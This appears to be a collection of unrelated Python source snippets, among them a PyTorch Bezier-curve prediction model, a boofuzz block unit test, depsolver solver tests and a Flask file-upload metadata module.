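    # dispatcher and serve requests from a queue. The broker URL and queue name are
    # placeholders, and `dispatcher.add` is assumed from the pjrpc dispatcher API;
    # adjust the registration call to your pjrpc version.
    import asyncio

    executor = Executor('amqp://guest:guest@localhost/', queue_name='jsonrpc')

    def ping() -> str:
        return 'pong'

    executor.dispatcher.add(ping)  # assumed pjrpc registration API

    async def main() -> None:
        await executor.start()
        try:
            await asyncio.Event().wait()  # serve until interrupted
        finally:
            await executor.shutdown()

    asyncio.run(main())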
|
469688
|
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as data
import numpy as np
import torch
import torch.nn.utils.rnn as RNNUtils
import sys
import deepracing_models.math_utils as mu
import math
class VariationalCurvePredictor(nn.Module):
def __init__(self, input_channels=3, bezier_order=7, fix_first_point=False,\
context_length = 5, hidden_dim = 200, num_recurrent_layers = 1, rnn_bidirectional=False, \
additional_rnn_calls=25, output_dimension = 2, use_3dconv=True):
super(VariationalCurvePredictor, self).__init__()
self.imsize = (66,200)
self.input_channels = input_channels
self.fix_first_point = fix_first_point
self.bezier_order = bezier_order
self.params_per_dimension = self.bezier_order + 1 - int(fix_first_point)
self.context_length = context_length
self.num_recurrent_layers = num_recurrent_layers
self.output_dimension = output_dimension
#activations
self.relu = nn.ReLU()
self.tanh = nn.Tanh()
self.sigmoid = nn.Sigmoid()
self.activations = nn.ModuleDict({"relu": self.relu, "tanh": self.tanh, "sigmoid": self.sigmoid})
# Convolutional layers.
self.conv1 = nn.Conv2d(self.input_channels, 24, kernel_size=5, stride=2)
self.Norm_1 = nn.BatchNorm2d(24)
self.conv2 = nn.Conv2d(24, 36, kernel_size=5, stride=2)
self.Norm_2 = nn.BatchNorm2d(36)
self.conv3 = nn.Conv2d(36, 48, kernel_size=5, stride=2)
self.Norm_3 = nn.BatchNorm2d(48)
self.conv4 = nn.Conv2d(48, 64, kernel_size=3)
self.Norm_4 = nn.BatchNorm2d(64)
self.conv5 = nn.Conv2d(64, 64, kernel_size=3)
self.Norm_5 = nn.BatchNorm2d(64)
self.state_encoder = torch.nn.Sequential(*[
self.conv1,
self.Norm_1,
self.conv2,
self.Norm_2,
self.conv3,
self.Norm_3,
self.conv4,
self.Norm_4,
self.conv5,
self.Norm_5
])
self.img_features = 1*64*18
self.projection_features = 240*self.context_length * 3 * 20
self.additional_rnn_calls = additional_rnn_calls
self.intermediate_projection_size = int(self.projection_features/self.additional_rnn_calls)
self.use_3dconv = use_3dconv
if self.use_3dconv:
#projection encoder
self.conv3d1 = nn.Conv3d(input_channels, 10, kernel_size=(5,3,3), stride = (1,2,2), padding=(2,0,0) )
self.Norm3d_1 = nn.BatchNorm3d(10)
self.conv3d2 = nn.Conv3d(10, 20, kernel_size=(5,3,3), stride = (1,2,2), padding=(2,0,0) )
self.Norm3d_2 = nn.BatchNorm3d(20)
self.conv3d3 = nn.Conv3d(20, 40, kernel_size=(3,3,3), stride = (1,2,2), padding=(1,0,0) )
self.Norm3d_3 = nn.BatchNorm3d(40)
self.Pool3d_1 = torch.nn.MaxPool3d(3, stride=(1,1,1), padding=(1,0,0) )
self.conv3d4 = nn.Conv3d(40, 120, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
self.Norm3d_4 = nn.BatchNorm3d(120)
self.conv3d5 = nn.Conv3d(120, 120, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
self.Norm3d_5 = nn.BatchNorm3d(120)
self.conv3d6 = nn.Conv3d(120, 240, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
self.Norm3d_6 = nn.BatchNorm3d(240)
self.Pool3d_2 = torch.nn.AvgPool3d(3, stride=(1,1,1), padding=(1,0,0))
self.projection_encoder = torch.nn.Sequential(*[
self.conv3d1,
self.Norm3d_1,
self.conv3d2,
self.Norm3d_2,
self.relu,
self.conv3d3,
self.Norm3d_3,
self.relu,
self.Pool3d_1,
self.conv3d4,
self.Norm3d_4,
self.tanh,
self.conv3d5,
self.Norm3d_5,
self.tanh,
self.conv3d6,
self.Norm3d_6,
self.tanh,
self.Pool3d_2,
])
self.projection_layer = nn.Linear(self.intermediate_projection_size, self.img_features)
else:
self.projection_features = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.additional_rnn_calls, self.img_features), requires_grad=True))
#recurrent layers
self.hidden_dim = hidden_dim
self.linear_rnn = nn.LSTM(self.img_features, self.hidden_dim, batch_first = True, num_layers = num_recurrent_layers, bidirectional=rnn_bidirectional)
self.linear_rnn_init_hidden = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.linear_rnn.num_layers*(int(self.linear_rnn.bidirectional)+1),self.hidden_dim)), requires_grad=True)
self.linear_rnn_init_cell = torch.nn.Parameter(torch.normal(0, 0.01, size=(self.linear_rnn.num_layers*(int(self.linear_rnn.bidirectional)+1),self.hidden_dim)), requires_grad=True)
# Sub-convolutional layers.
self.subConv1 = nn.Conv2d(1, 16, kernel_size=5, stride=(2,2), padding=(2,2))
self.subConvNorm_1 = nn.BatchNorm2d(self.subConv1.out_channels)
self.subConv2 = nn.Conv2d(16, 32, kernel_size=5, stride=(1,2), padding=(2,2))
self.subConvNorm_2 = nn.BatchNorm2d(self.subConv2.out_channels)
self.subConv3 = nn.Conv2d(32, 64, kernel_size=5, stride=1)
self.subConvNorm_3 = nn.BatchNorm2d(self.subConv3.out_channels)
self.subConvPool_1 = torch.nn.MaxPool2d(3, stride=(1,1))
self.subConv4 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.subConvNorm_4 = nn.BatchNorm2d(self.subConv4.out_channels)
self.subConv5= nn.Conv2d(64, 128, kernel_size=3, stride=1)
self.subConvNorm_5 = nn.BatchNorm2d(self.subConv5.out_channels)
self.subConvPool_2 = torch.nn.MaxPool2d(3, stride=(1,1))
self.hidden_decoder = torch.nn.Sequential(*[
self.subConv1,
self.subConvNorm_1,
self.relu,
self.subConv2,
self.subConvNorm_2,
self.subConv3,
self.relu,
self.subConvNorm_3,
self.relu,
self.subConvPool_1,
self.subConv4,
self.subConvNorm_4,
self.relu,
self.subConv5,
self.subConvNorm_5,
self.relu,
self.subConvPool_2,
])
self.hidden_decoder_features = 2432
self.numvars = self.output_dimension*self.params_per_dimension
self.covarsperdim = int((self.output_dimension-1)*self.output_dimension/2)
self.numcovars = self.covarsperdim*self.params_per_dimension
self.classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 500),
self.tanh,
nn.Linear(500, self.params_per_dimension)
#nn.Linear(2432, self.params_per_dimension)
]
)
self.var_linear = nn.Linear(250, self.params_per_dimension)
self.var_linear.weight=torch.nn.Parameter(0.0001*torch.randn(self.params_per_dimension, 250), requires_grad=True)
self.var_linear.bias=torch.nn.Parameter(1.0*torch.ones(self.params_per_dimension), requires_grad=True)
self.var_classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 250),
self.activations["sigmoid"],
self.var_linear,
self.relu
]
)
self.covar_linear = nn.Linear(self.output_dimension*250, self.numcovars)
self.covar_linear.weight=torch.nn.Parameter(0.0001*torch.randn(self.numcovars, self.output_dimension*250), requires_grad=True)
self.covar_linear.bias=torch.nn.Parameter(0.001*torch.ones(self.numcovars), requires_grad=True)
self.covar_classifier = nn.Sequential(*[
nn.Linear(self.hidden_decoder_features, 1200),
self.relu,
nn.Linear(1200, 250),
self.activations["tanh"],
nn.Flatten(),
self.covar_linear
]
)
def forward(self, x):
#resize for convolutional layers
batch_size = x.shape[0]
#print(y.shape)
convin = x.view(-1, self.input_channels, self.imsize[0], self.imsize[1])
convout = self.state_encoder(convin)
context_in = convout.view(batch_size , self.context_length , self.img_features)
linear_rnn_init_hidden = self.linear_rnn_init_hidden.unsqueeze(1).repeat(1,batch_size,1)
linear_rnn_init_cell = self.linear_rnn_init_cell.unsqueeze(1).repeat(1,batch_size,1)
# linear_rnn_init_hidden = self.linear_rnn_init_hidden.expand(self.linear_rnn_init_hidden.shape[0],batch_size,self.linear_rnn_init_hidden.shape[1])
# linear_rnn_init_cell = self.linear_rnn_init_cell.expand(self.linear_rnn_init_cell.shape[0],batch_size,self.linear_rnn_init_cell.shape[1])
#print(context_in.shape)
# = RNNUtils.pack_padded_sequence(context_in, (context_in.shape[1]*np.ones(context_in.shape[0])).tolist() , batch_first=True, enforce_sorted=False)
_, (linear_new_hidden, linear_new_cell) = self.linear_rnn(context_in, (linear_rnn_init_hidden, linear_rnn_init_cell) )
#print(conv3d_out.shape)
if self.use_3dconv:
conv3d_out = self.projection_encoder( x.view(batch_size, self.input_channels, self.context_length, self.imsize[0], self.imsize[1]) )
projection_in = conv3d_out.view(batch_size, self.additional_rnn_calls, self.intermediate_projection_size)
projection_features = self.projection_layer(projection_in)
else:
projection_features = self.projection_features.expand(batch_size,self.projection_features.shape[0],self.projection_features.shape[1])
x_linear, (final_hidden_position, final_cell_position) = self.linear_rnn( projection_features , (linear_new_hidden, linear_new_cell) )
x_linear_unsqueeze = x_linear.unsqueeze(1)
hidden_convout = self.hidden_decoder(x_linear_unsqueeze)
x_features = hidden_convout.view(batch_size,self.output_dimension,self.hidden_decoder_features)
means_ = self.classifier(x_features).transpose(1,2)
varfactors_ = (self.var_classifier(x_features) + 1E-5).transpose(1,2)
covarfactors_ = self.covar_classifier(x_features).view(batch_size, self.params_per_dimension, self.covarsperdim)
if self.fix_first_point:
means = torch.cat([torch.zeros(batch_size, 1, self.output_dimension, dtype=means_.dtype, device=means_.device), means_], dim=1)
varfactors = torch.cat([1E-4*torch.ones(batch_size, 1, self.output_dimension, dtype=varfactors_.dtype, device=varfactors_.device), varfactors_], dim=1)
covarfactors = torch.cat([torch.zeros(batch_size, 1, self.covarsperdim, dtype=covarfactors_.dtype, device=covarfactors_.device), covarfactors_], dim=1)
else:
means = means_
varfactors = varfactors_
covarfactors = covarfactors_
return means, varfactors, covarfactors
class ConvolutionalAutoencoder(nn.Module):
def __init__(self, manifold_channels, in_channels):
super(ConvolutionalAutoencoder, self).__init__()
self.manifold_channels = manifold_channels
self.elu = torch.nn.ELU()
self.sigmoid = torch.nn.Sigmoid()
self.conv_layers = nn.Sequential(*[
nn.Conv2d(in_channels, 32, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(32),
self.elu,
nn.Conv2d(32, 64, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(64),
self.elu,
nn.Conv2d(64, 64, kernel_size = 5, bias = False),
nn.BatchNorm2d(64),
self.elu,
nn.Conv2d(64, 64, kernel_size = 5, bias = False),
nn.BatchNorm2d(64),
nn.Conv2d(64, manifold_channels, kernel_size = 12, bias = True),
self.elu,
])
self.deconv_layers = nn.Sequential(*[
nn.ConvTranspose2d(manifold_channels, 64, kernel_size = 12, bias = True),
nn.BatchNorm2d(64),
self.elu,
nn.ConvTranspose2d(64, 32, kernel_size = 5, bias = False),
nn.BatchNorm2d(32),
self.elu,
nn.ConvTranspose2d(32, 16, kernel_size = 5, stride=1, bias = False),
nn.BatchNorm2d(16),
self.elu,
nn.ConvTranspose2d(16, 16, kernel_size = 5, bias = False),
nn.BatchNorm2d(16),
self.elu,
nn.ConvTranspose2d(16, in_channels, kernel_size = 5, stride=1, bias = False),
self.sigmoid,
])
def encoder(self, x):
return self.conv_layers(x)
def decoder(self, z):
return self.deconv_layers(z)
def forward(self, x):
z = self.encoder(x)
# print(z.shape)
y = self.decoder(z)
return z, y
class VariationalImageCurveDecoder(nn.Module):
def __init__(self, manifold_dimension, reconstruct_dimension, hidden_dim=350):
super(VariationalImageCurveDecoder, self).__init__()
self.reconstruct_dimension = reconstruct_dimension
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
# self.rnn = nn.LSTM(manifold_dimension, hidden_dim, batch_first=True)
# self.init_hidden = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
# self.init_cell = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
# self.linear = nn.Linear(hidden_dim, reconstruct_dimension)
# self.linear1 = nn.Linear(manifold_dimension, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, reconstruct_dimension)
self.linear_layers = torch.nn.Sequential(*[
nn.Linear(manifold_dimension, hidden_dim, bias = True ),
self.sigmoid,
nn.Linear(hidden_dim, reconstruct_dimension, bias = False ),
])
def forward(self, sample_curve_points):
# batch_size = sample_curve_points.shape[0]
# h_0 = self.init_hidden.repeat(1,batch_size,1)
# c_0 = self.init_cell.repeat(1,batch_size,1)
# rnn_out, (h_n, c_n) = self.rnn(sample_curve_points, (h_0, c_0) )
return torch.clamp(self.linear_layers(sample_curve_points), 0.0, 1.0)
class VariationalImageCurveEncoder(nn.Module):
def __init__(self, output_dim = 250, bezier_order=3, sequence_length=5, input_channels=3, hidden_dim=500):
super(VariationalImageCurveEncoder, self).__init__()
self.output_dim = output_dim
self.bezier_order = bezier_order
self.sequence_length = sequence_length
self.num_latent_vars = (bezier_order+1)*output_dim
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
self.conv2dlayers = torch.nn.Sequential(*[
# nn.BatchNorm2d(input_channels),
nn.Conv2d(input_channels, 24, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(24),
#self.relu,
nn.Conv2d(24, 36, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(36),
#self.relu,
nn.Conv2d(36, 48, kernel_size=5, stride=2, bias=False),
nn.BatchNorm2d(48),
# self.relu,
nn.Conv2d(48, 64, kernel_size=3, bias=False),
nn.BatchNorm2d(64),
#self.relu,
nn.Conv2d(64, 96, kernel_size=3),
# self.tanh,
nn.BatchNorm2d(96)
])
self.rnn = nn.LSTM(1728, hidden_dim, batch_first=True)
self.init_hidden = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
self.init_cell = torch.nn.Parameter(torch.normal(0, 0.1, size=(1,hidden_dim)), requires_grad=True)
self.down_to_bezier_mu = nn.Linear(hidden_dim, self.num_latent_vars)
self.down_to_bezier_logvar = nn.Linear(hidden_dim, self.num_latent_vars)
def forward(self, images):
batch_size = images.shape[0]
assert(images.shape[1]==self.sequence_length)
channels, rows, columns = images.shape[2:]
packed_for_2dconv = images.view(-1,channels,rows,columns)
conv2dout = self.conv2dlayers(packed_for_2dconv)
# print(conv2dout.shape)
conv2doutflatten = conv2dout.view(batch_size, self.sequence_length, -1, )
# print(conv2doutflatten.shape)
h_0 = self.init_hidden.unsqueeze(1).repeat(1,batch_size,1)
c_0 = self.init_cell.unsqueeze(1).repeat(1,batch_size,1)
rnnout, (h_n, c_n) = self.rnn(conv2doutflatten, (h_0, c_0))
# print(rnnout.shape)
#encoderout = self.encoder(images)
bezier_mu_flat = self.down_to_bezier_mu(rnnout[:,-1])
        # Log-variance head for the Bezier control points.
        bezier_logstdev_flat = self.down_to_bezier_logvar(rnnout[:,-1])
bezier_stdev_flat = torch.exp(0.5*bezier_logstdev_flat)
bezier_mu = bezier_mu_flat.view(batch_size, self.bezier_order+1, self.output_dim)
bezier_stdev = bezier_stdev_flat.view(batch_size, self.bezier_order+1, self.output_dim)
scale_tril = torch.diag_embed(bezier_stdev_flat)
# distribution = torch.distributions.MultivariateNormal(, scale_tril=scale_tril, validate_args=True)
# # curvesample = distribution.sample((1,))[0].view(batch_size, self.bezier_order+1, self.output_dim)
return bezier_mu, bezier_stdev
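if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): shape smoke test for
    # VariationalCurvePredictor with its default configuration. The input layout
    # (batch, context_length, channels, 66, 200) is an assumption inferred from the
    # view() calls in forward().
    model = VariationalCurvePredictor()
    dummy = torch.randn(2, model.context_length, model.input_channels, 66, 200)
    with torch.no_grad():
        means, varfactors, covarfactors = model(dummy)
    print(means.shape, varfactors.shape, covarfactors.shape)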
|
469718
|
from pytest_bdd import given, when, then, scenarios
from boofuzz import Request, Block, Byte
scenarios('block_original_value.feature')
@given('A Block with contents')
def request_one_block(context):
request = Request(name="unit-test-request")
block = Block(name="unit-test-block", request=request)
request.push(block)
byte1 = Byte(0x01, name="Byte block 1")
request.push(byte1)
request.pop()
context.uut = block
@given('Mutated once')
def mutate_once(context):
context.uut.mutate()
@given('Mutated twice')
def mutate_twice(context):
context.uut.mutate()
context.uut.mutate()
@given('Mutated thrice')
def mutate_thrice(context):
context.uut.mutate()
context.uut.mutate()
context.uut.mutate()
@when('Calling original_value')
def call_original_value(context):
context.uut.render() # Ensure UUT object state is updated
context.result = context.uut.original_value
@then('Result equals .render()')
def result_equals_render(context):
assert context.result == context.uut.render()
@then('Result equals .render() after .reset()')
def result_equals_render_after_reset(context):
context.uut.reset()
assert context.result == context.uut.render()
|
469731
|
import datetime
import pandas as pd
from ast import literal_eval
def invert_oracle_sense(oracle):
def inverted_oracle(lambda_k):
x_k, d_k, diff_d_k = oracle(lambda_k)
return x_k, -d_k, -diff_d_k
return inverted_oracle
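# Example (illustrative): wrapping a maximization oracle with invert_oracle_sense
# yields an oracle suitable for a minimization routine, since the value d_k and its
# (sub)gradient diff_d_k are negated while the primal point x_k is passed through.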
def record_logger(logger, filename=r'logger_record.csv'):
""" Records the information contained in a method logger into a csv. """
inner_problem = logger.method.oracle.__self__
instance_name = inner_problem.instance_name
instance_subtype = inner_problem.instance_subtype
instance_type = inner_problem.instance_type
method_desc = logger.method.desc
method_name = logger.method.method_name
method_parameter = logger.method.parameter
d_k = logger.d_k_iterates
d_k = ['%.2f' % elem for elem in d_k] # format it
oracle_calls = logger.oracle_calls
computation_times = logger.iteration_time
computation_times = ['%.2f' % elem for elem in computation_times] # format it
date = datetime.datetime.now()
try:
df = pd.read_csv(filename)
except IOError as e:
        # TODO: there is something buggy about this when run in an IPython notebook; it thinks the file isn't created
print(e)
print('Record file does not exist. Creating {} ...'.format(filename))
columns = ('date', 'instance_name', 'instance_subtype', 'instance_type',
'method_desc', 'method_name', 'method_parameter', 'd_k', 'oracle_calls',
'computation_times')
df = pd.DataFrame(columns=columns)
# Append data to dataframe
df.loc[len(df)] = [
date, instance_name, instance_subtype, instance_type,
method_desc, method_name, method_parameter,
d_k, oracle_calls, computation_times
]
df.to_csv(filename, index=False)
def flatten_record_dataframe(df):
""" The above function stores
- d_k
- oracle_calls
- computation_times
as strings. We flatten these back to lists (of floats) """
for index, row in df.iterrows():
d_k = literal_eval(row.d_k) # list results were saved as strings...
d_k = [float(i) for i in d_k] # so we have to convert them back to floats manually
        df.at[index, 'd_k'] = d_k  # .at allows assigning a list to a single cell
# same for oracle_calls
oracle_calls = literal_eval(row.oracle_calls)
oracle_calls = [float(i) for i in oracle_calls]
        df.at[index, 'oracle_calls'] = oracle_calls
# and computation_times
computation_times = literal_eval(row.computation_times) # list results were saved as strings...
computation_times = [float(i) for i in computation_times] # so we have to convert them back to floats manually
        df.at[index, 'computation_times'] = computation_times
return df
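if __name__ == '__main__':
    # Hedged usage sketch (not part of the original module): read back a record file
    # written by record_logger and restore the list-valued columns.
    # 'logger_record.csv' is the default filename used above and must already exist.
    records = pd.read_csv('logger_record.csv')
    records = flatten_record_dataframe(records)
    print(records[['instance_name', 'method_name', 'd_k']].head())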
|
469744
|
import six
if six.PY3:
import unittest
else:
import unittest2 as unittest
from depsolver.package \
import \
PackageInfo
from depsolver.pool \
import \
Pool
from depsolver.repository \
import \
Repository
from depsolver.requirement \
import \
Requirement
from depsolver.solver.core \
import \
Install, Solver, Update
from depsolver.solver.policy \
import \
DefaultPolicy
R = Requirement.from_string
mkl_10_1_0 = PackageInfo.from_string("mkl-10.1.0")
mkl_10_2_0 = PackageInfo.from_string("mkl-10.2.0")
mkl_10_3_0 = PackageInfo.from_string("mkl-10.3.0")
mkl_11_0_0 = PackageInfo.from_string("mkl-11.0.0")
numpy_1_6_0 = PackageInfo.from_string("numpy-1.6.0; depends (mkl)")
numpy_1_6_1 = PackageInfo.from_string("numpy-1.6.1; depends (mkl)")
numpy_1_7_0 = PackageInfo.from_string("numpy-1.7.0; depends (mkl)")
nomkl_numpy_1_7_0 = PackageInfo.from_string("nomkl_numpy-1.7.0; depends (numpy == 1.7.0)")
scipy_0_10_1 = PackageInfo.from_string("scipy-0.10.1; depends (numpy >= 1.6.0)")
scipy_0_11_0 = PackageInfo.from_string("scipy-0.11.0; depends (numpy >= 1.6.0)")
scipy_0_12_0 = PackageInfo.from_string("scipy-0.12.0; depends (numpy >= 1.7.0)")
policy = DefaultPolicy()
def solve(pool, requirement, installed_repository, policy):
solver = Solver(pool, installed_repository, policy)
return solver.solve(requirement)
class TestSimpleScenario(unittest.TestCase):
"""Scenario with no dependencies."""
@unittest.expectedFailure
def test_no_install(self):
"""Ensure the most up-to-date version is installed when directly installed."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("mkl"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0)])
@unittest.expectedFailure
def test_already_satisfied(self):
"""Ensure we don't install a more recent version when the requirement
is already satisfied."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
installed_repo.add_package(mkl_10_2_0)
operations = solve(pool, R("mkl"), installed_repo, policy)
self.assertEqual(operations, [])
@unittest.expectedFailure
def test_already_installed_but_not_satisfied(self):
"""Ensure we update to the most recent version when the requirement
is not already satisfied."""
repo = Repository([mkl_10_1_0, mkl_10_2_0, mkl_10_3_0, mkl_11_0_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
installed_repo.add_package(mkl_10_2_0)
operations = solve(pool, R("mkl >= 10.3.0"), installed_repo, policy)
self.assertEqual(operations, [Update(mkl_10_2_0, mkl_11_0_0)])
class TestOneLevel(unittest.TestCase):
"""Scenario with one level of dependencies."""
@unittest.expectedFailure
def test_simple(self):
"""Numpy depends on MKL, one version of NumPy only."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0), Install(numpy_1_6_0)])
@unittest.expectedFailure
def test_simple2(self):
"""Numpy depends on MKL, ensure we install the most up-to-date version."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(mkl_11_0_0), Install(numpy_1_7_0)])
@unittest.expectedFailure
def test_dependency_already_provided(self):
"""Numpy depends on MKL, MKL already installed."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository([mkl_11_0_0])
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(numpy_1_7_0)])
@unittest.expectedFailure
def test_dependency_already_provided_but_older(self):
"""Numpy depends on MKL, older MKL already installed."""
repo = Repository([mkl_10_2_0, mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository([mkl_10_3_0])
operations = solve(pool, R("numpy"), installed_repo, policy)
self.assertEqual(operations, [Install(numpy_1_7_0)])
class TestTwoLevels(unittest.TestCase):
"""Scenario with one level of dependencies."""
@unittest.expectedFailure
def test_simple(self):
r_operations = [Install(mkl_11_0_0), Install(numpy_1_7_0),
Install(scipy_0_12_0)]
repo = Repository([mkl_10_3_0, mkl_11_0_0, numpy_1_6_0, numpy_1_6_1,
numpy_1_7_0, scipy_0_12_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
req = R("scipy")
operations = solve(pool, req, installed_repo, policy)
self.assertEqual(operations, r_operations)
@unittest.expectedFailure
def test_simple_provided(self):
r_operations = [Install(nomkl_numpy_1_7_0), Install(scipy_0_11_0)]
repo = Repository([mkl_11_0_0, scipy_0_11_0, nomkl_numpy_1_7_0])
pool = Pool()
pool.add_repository(repo)
installed_repo = Repository()
operations = solve(pool, R("scipy"), installed_repo, policy)
self.assertEqual(operations, r_operations)
|
469750
|
import re
import time
import mimetypes
from werkzeug.exceptions import BadRequest, RequestEntityTooLarge
from flask import current_app
try:
import magic as magic_module
magic = magic_module.Magic(mime=True)
magic_bufsz = magic.getparam(magic_module.MAGIC_PARAM_BYTES_MAX)
except ImportError:
magic = None
magic_bufsz = None
from ..constants import (
COMPLETE,
FILENAME,
FOREVER,
HASH,
LOCKED,
SIZE,
TIMESTAMP_DOWNLOAD,
TIMESTAMP_MAX_LIFE,
TIMESTAMP_UPLOAD,
TYPE,
TYPE_HINT,
internal_meta,
)
from .name import ItemName
from .decorators import threaded
from .hashing import compute_hash, hash_new
# we limit to 250 characters as we do not want to accept arbitrarily long
# filenames. other than that, there is no specific reason we could not
# also take more (or less).
MAX_FILENAME_LENGTH = 250
class Upload:
_filename_re = re.compile(r'[^a-zA-Z0-9 *+:;.,_-]+')
_type_re = re.compile(r'[^a-zA-Z0-9/+.-]+')
@classmethod
def filter_size(cls, i):
"""
Filter size.
Check for advertised size.
"""
try:
i = int(i)
except (ValueError, TypeError):
raise BadRequest(description='Size is invalid')
if i > current_app.config['MAX_ALLOWED_FILE_SIZE']:
raise RequestEntityTooLarge()
return i
@classmethod
def filter_filename(cls, filename, storage_name, content_type, content_type_hint):
"""
Filter filename.
        Only allow some basic characters and shorten to MAX_FILENAME_LENGTH characters.
"""
# Make up filename if we don't have one
if not filename:
if not content_type:
content_type = content_type_hint
# note: stdlib mimetypes.guess_extension is total crap
if content_type.startswith("text/"):
ext = ".txt"
else:
ext = ".bin"
filename = storage_name + ext
return cls._filename_re.sub('', filename)[:MAX_FILENAME_LENGTH]
@classmethod
def filter_type(cls, ct, ct_hint, filename=None):
"""
Filter Content-Type
Only allow some basic characters and shorten to 50 characters.
Return value:
tuple[0] - content-type string
tuple[1] - whether tuple[0] is hint or not
True: content-type is just a hint
False: content-type is not a hint, was specified by user
"""
if not ct and filename:
ct, encoding = mimetypes.guess_type(filename)
if not ct:
return ct_hint, True
return cls._type_re.sub('', ct)[:50], False
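    # Example (illustrative): filter_type(None, 'application/octet-stream', filename='notes.txt')
    # guesses 'text/plain' from the filename and returns ('text/plain', False), while
    # filter_type(None, 'application/octet-stream') falls back to the hint and returns
    # ('application/octet-stream', True).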
@classmethod
def meta_new(cls, item, input_size, input_filename, input_type,
input_type_hint, storage_name, maxlife_stamp=FOREVER):
item.meta[FILENAME] = cls.filter_filename(
input_filename, storage_name, input_type, input_type_hint
)
item.meta[SIZE] = cls.filter_size(input_size)
ct, hint = cls.filter_type(input_type, input_type_hint, input_filename)
item.meta[TYPE] = ct
item.meta[TYPE_HINT] = hint
item.meta[TIMESTAMP_UPLOAD] = int(time.time())
item.meta[TIMESTAMP_DOWNLOAD] = 0
item.meta[LOCKED] = current_app.config['UPLOAD_LOCKED']
item.meta[COMPLETE] = False
item.meta[HASH] = ''
item.meta[TIMESTAMP_MAX_LIFE] = maxlife_stamp
@classmethod
def meta_complete(cls, item, file_hash):
# update TYPE by python-magic if not decided yet
if item.meta.pop(TYPE_HINT, False):
if magic and current_app.config.get('USE_PYTHON_MAGIC', False):
if item.meta[TYPE] == 'application/octet-stream':
item.meta[TYPE] = magic.from_buffer(item.data.read(magic_bufsz, 0))
item.meta[COMPLETE] = True
item.meta[HASH] = file_hash
@staticmethod
def data(item, f, size_input, offset=0):
"""
Copy data from temp file into storage.
"""
read_length = 16 * 1024
size_written = 0
hasher = hash_new()
while True:
read_length = min(read_length, size_input)
if size_input == 0:
break
buf = f.read(read_length)
if not buf:
# Should not happen, we already checked the size
raise RuntimeError
item.data.write(buf, offset + size_written)
hasher.update(buf)
len_buf = len(buf)
size_written += len_buf
size_input -= len_buf
return size_written, hasher.hexdigest()
def create_item(f, filename, size, content_type, content_type_hint,
maxlife_stamp=FOREVER):
"""
create an item from open file <f> with the given metadata, return the item name.
"""
name = ItemName.create(current_app.storage)
with current_app.storage.create(name, size) as item:
size_written, file_hash = Upload.data(item, f, size)
Upload.meta_new(item, size, filename, content_type, content_type_hint,
name, maxlife_stamp=maxlife_stamp)
Upload.meta_complete(item, file_hash)
return name
def filter_internal(meta):
"""
filter internal meta data out.
"""
return {k: v for k, v in meta.items() if k not in internal_meta}
@threaded
def background_compute_hash(storage, name):
with storage.openwrite(name) as item:
size = item.meta[SIZE]
file_hash = compute_hash(item.data, size)
item.meta[HASH] = file_hash
|
469780
|
from strictdoc.core.level_counter import LevelCounter
def test_01():
level_counter = LevelCounter()
assert level_counter.get_string() == ""
level_counter.adjust(1)
assert level_counter.get_string() == "1"
level_counter.adjust(1)
assert level_counter.get_string() == "2"
level_counter.adjust(2)
assert level_counter.get_string() == "2.1"
level_counter.adjust(3)
assert level_counter.get_string() == "2.1.1"
level_counter.adjust(2)
assert level_counter.get_string() == "2.2"
level_counter.adjust(1)
assert level_counter.get_string() == "3"
|
469800
|
import os
from kipoi_utils.data_utils import get_dataset_item, numpy_collate_concat
from kipoi_utils.utils import unique_list
import keras.backend as K
import matplotlib.ticker as ticker
from bpnet.functions import softmax
from genomelake.extractors import FastaExtractor
from keras.models import load_model
from collections import OrderedDict
from bpnet.plot.tracks import plot_tracks, filter_tracks
from bpnet.extractors import extract_seq
from bpnet.data import nested_numpy_minibatch
from bpnet.seqmodel import SeqModel
from tqdm import tqdm
from bpnet.utils import flatten_list
